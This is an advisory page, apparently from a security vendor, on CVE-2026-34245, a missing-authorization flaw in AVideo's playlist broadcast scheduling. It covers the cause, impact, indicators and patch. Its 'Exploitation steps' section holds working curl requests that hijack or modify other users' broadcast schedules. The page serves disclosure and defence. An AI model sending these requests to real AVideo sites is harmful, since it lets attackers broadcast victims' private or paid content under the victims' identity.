CVE-2026-34245: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34245 is a missing authorization vulnerability in WWBN AVideo, an open source video platform, that allows any authenticated user with streaming permission to create or modify broadcast schedules targeting any playlist on the platform, regardless of ownership. Affected versions include all releases up to and including 26.0. The vulnerability was published on March 27, 2026, with a patch available in commit 1e6dc20172de986f60641eb4fdb4090f079ffdce. It carries a CVSS v3.1 base score of 6.3 (Medium) (Github Advisory, Feedly).

Technical details

The root cause is CWE-862 (Missing Authorization): the plugin/PlayLists/View/Playlists_schedules/add.json.php endpoint performs only a capability check (User::canStream()) but never verifies that the requesting user owns the target playlist. The attacker-controlled playlists_id POST parameter is passed directly to Playlists_schedules::setPlaylists_id() without any ownership validation, and the save() method only checks that playlists_id is non-empty. When the scheduled broadcast executes via plugin/PlayLists/run.php, it calls Rebroadcaster::rebroadcastVideo() using the victim playlist owner's user ID ($pl->getUsers_id()), not the schedule creator's. By contrast, all other playlist modification endpoints in AVideo (e.g., saveShowOnTV.json.php, playListToSerie.php) correctly invoke PlayLists::canManagePlaylist() for ownership verification (Github Advisory).

Impact

Successful exploitation enables content hijacking, allowing an attacker to force-broadcast content from any user's playlist — including private or paid content — under the victim's identity, making it appear the victim initiated the broadcast. Attackers can also disrupt a victim's ongoing live streams, tamper with or redirect existing broadcast schedules, and consume the victim's server bandwidth allocation. The integrity and availability of affected users' streaming services are directly impacted, and limited confidentiality exposure arises from unauthorized access to private playlist content (Github Advisory).

Exploitability

A proof-of-concept exploit is publicly available in the GitHub Security Advisory, consisting of concrete curl commands that demonstrate the authorization bypass against a live AVideo deployment. Exploitation requires only a valid authenticated session with streaming permission — no administrative privileges are needed. The EPSS score is approximately 0.018% (0.034% per Feedly), indicating low current exploitation probability. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog (Github Advisory).

Exploitation steps

  1. Reconnaissance: Identify an AVideo instance running version 26.0 or earlier. Enumerate playlist IDs belonging to other users via the platform's API or public playlist listings.
  2. Authenticate: Log in to the AVideo platform as any user account that has been granted streaming permission. Capture the PHPSESSID session cookie.
  3. Create a rogue broadcast schedule: Send a crafted HTTP POST request to the vulnerable endpoint, supplying the victim's playlists_id:
curl -X POST 'https://target.com/plugin/PlayLists/View/Playlists_schedules/add.json.php' \
  -H 'Cookie: PHPSESSID=<your_session_id>' \
  -d 'playlists_id=<VICTIM_PLAYLIST_ID>&name=hijacked&start_datetime=2026-03-26+12:00:00&finish_datetime=2026-03-27+12:00:00&loop=1&repeat=d&parameters={}'
  1. Confirm success: A response of {"error":false} confirms the schedule was created for the victim's playlist without ownership verification.
  2. Modify an existing schedule (optional): Supply an existing schedule's id in the POST body to redirect or tamper with it:
curl -X POST 'https://target.com/plugin/PlayLists/View/Playlists_schedules/add.json.php' \
  -H 'Cookie: PHPSESSID=<your_session_id>' \
  -d 'id=<SCHEDULE_ID>&playlists_id=<VICTIM_PLAYLIST_ID>&name=modified&start_datetime=2026-03-26+00:00:00&finish_datetime=2026-03-28+00:00:00&loop=1&repeat=d&parameters={}'
  1. Schedule execution: When the scheduled time arrives, plugin/PlayLists/run.php triggers the rebroadcast under the victim playlist owner's user identity, completing the hijack (Github Advisory).

Indicators of compromise

  • Network: Unexpected HTTP POST requests to /plugin/PlayLists/View/Playlists_schedules/add.json.php from users who do not own the playlists_id specified in the request body; unusual rebroadcast activity originating from the server at scheduled times not initiated by the playlist owner.
  • Logs: Web server access logs showing POST requests to add.json.php with playlists_id values belonging to other users; run.php execution logs showing rebroadcasts attributed to a user ID that did not create the schedule.
  • Application Behavior: Broadcast schedules appearing in a user's playlist that the user did not create; unexpected live stream activity or bandwidth spikes associated with a user's account during scheduled times they did not configure.

Mitigation and workarounds

Apply the patch introduced in commit 1e6dc20172de986f60641eb4fdb4090f079ffdce, which adds PlayLists::canManagePlaylist() ownership checks to add.json.php for both new schedule creation and modification of existing schedules. As an interim workaround, restrict streaming permissions to only fully trusted users until the patch can be applied. Additionally, monitor broadcast schedules for unauthorized modifications or unusual rebroadcast activity as a detection measure (Github Advisory, Patch Commit).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management